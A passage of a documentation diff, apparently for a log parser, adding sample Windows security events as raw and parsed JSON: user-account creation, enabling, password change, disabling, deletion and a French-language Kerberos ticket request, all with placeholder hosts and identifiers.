it Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", + "event": { + "action": "added-user-account", + "category": [ + "iam" + ], + "code": "4720", + "kind": "event", + "module": "security", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "creation", + "user" + ] + }, + "@timestamp": "2024-11-12T04:47:02.389000Z", + "action": { + "id": 4720, + "outcome": "success", + "properties": { + "AccountExpires": "%%1794", + "AllowedToDelegateTo": "-", + "DisplayName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "LogonHours": "%%1793", + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + "NewUacValue": "0x214", + "OldUacValue": "0x0", + "PasswordLastSet": "%%1794", + "PrimaryGroupId": "513", + "PrivilegeList": "-", + "ProfilePath": "-", + "SamAccountName": "USER", + "ScriptPath": "-", + "SidHistory": "-", + "SubjectDomainName": "RESEAU-COMPANY", + "SubjectLogonId": "0x2a4b2040", + "SubjectUserName": "user-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "RESEAU-COMPANY", + "TargetSid": "S-1-2-3-4-5-6-7", + "TargetUserName": "USER", + "UserAccountControl": [ + "2082", + "2084", + "2089" + ], + "UserParameters": "-", + "UserPrincipalName": "USER@reseau.company", + "UserWorkstations": "-" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "name": "AGENT", + "type": "winlogbeat", + "version": "7.12.1" + }, + "host": { + "name": "HOST01.reseau.company" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "user-name" + ] + }, + "user": { + "domain": "RESEAU-COMPANY", + "id": "S-1-2-3", + "name": "user-name" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.reseau.company", + "event_data": { + "NewUACList": [ + "LOCKOUT", + "NORMAL_ACCOUNT" + ], + 
"UserAccountControl": [ + "2082", + "2084", + "2089" + ] + }, + "event_id": "4720", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x2a4b2040" + }, + "opcode": "Info", + "process": { + "pid": 612, + "thread": { + "id": 1940 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "479720536", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4722.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4722", + "kind": "event", + "module": "security", + "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:53:57.535000Z", + "action": { + "id": 4722, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a13c3fc", + "SubjectUserName": "account-name", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": 
"S-1-2-3-4-5", + "TargetUserName": "ACC_NAME" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "12345678-abcd-90ef-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "AA-BB-CC-DD-EE-FF" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account-name" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account-name", + "target": { + "domain": "DOMAIN", + "name": "ACC_NAME" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4722", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a13c3fc" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042939152", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4723.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 
(WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4723", + "kind": "event", + "module": "security", + "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:59:04.757000Z", + "action": { + "id": 4723, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x4a28ebbf", + "SubjectUserName": "ACCOUNT", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333", + "id": "123456-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, 
+ "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4723", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x4a28ebbf" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 11608 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13043050897", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4725.json" + + ```json + + { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4725", + "kind": "event", + "module": "security", + "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:41:11.055000Z", + "action": { + "id": 4725, + "outcome": "success", + "properties": { + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x493fa12d", + "SubjectUserName": "jdoe", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-4-5-6", + "TargetUserName": 
"ACCOUNT" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "jdoe", + "target": { + "domain": "DOMAIN", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.domain.com", + "event_id": "4725", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x493fa12d" + }, + "opcode": "Info", + "process": { + "pid": 756, + "thread": { + "id": 7304 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "13042691344", + "task": "User Account Management" + } + } + + ``` + + +=== "security_event_4726.json" + + ```json + + { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account 
Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", + "event": { + "action": "User Account Management", + "code": "4726", + "kind": "event", + "module": "security", + "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T07:58:13.288000Z", + "action": { + "id": 4726, + "outcome": "success", + "properties": { + "PrivilegeList": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3005c1f76", + "SubjectUserName": "doe.j", + "SubjectUserSid": "S-1-2-3", + 
"TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3-4-5", + "TargetUserName": "smithee.a" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-ABCD-ef90-1234-abcdef123456", + "name": "hostname", + "type": "winlogbeat", + "version": "7.17.1" + }, + "host": { + "name": "hostname.domain.net" + }, + "log": { + "level": "information" + }, + "related": { "user": [ - "HOST01" + "doe.j" ] }, "user": { - "domain": "COMPANY", - "effective": { - "domain": "-", - "id": "S-1-0-0", - "name": "-" - }, - "id": "S-1-1-1", - "name": "HOST01", + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "doe.j", "target": { - "domain": "-", - "name": "-" + "domain": "DOMAIN", + "name": "smithee.a" } }, "winlog": { "api": "wineventlog", "channel": "Security", - "computer_name": "HOST01.company.test", - "event_id": "4688", - "keywords": [ - "Audit Success" - ], + "computer_name": "hostname.domain.net", + "event_id": "4726", "logon": { - "id": "0x3e7" + "id": "0x3005c1f76" }, - "opcode": "Info", "process": { - "pid": 4, + "pid": 632, "thread": { - "id": 17028 + "id": 2056 } }, "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "provider_name": "Microsoft-Windows-Security-Auditing", - "record_id": "8884538", - "task": "Process Creation", - "version": 2 + "record_id": "25349190364", + "task": "User Account Management" } } 
@@ -2310,6 +3547,203 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "security_event_4768.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur 
:\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + 
"action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": "security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": 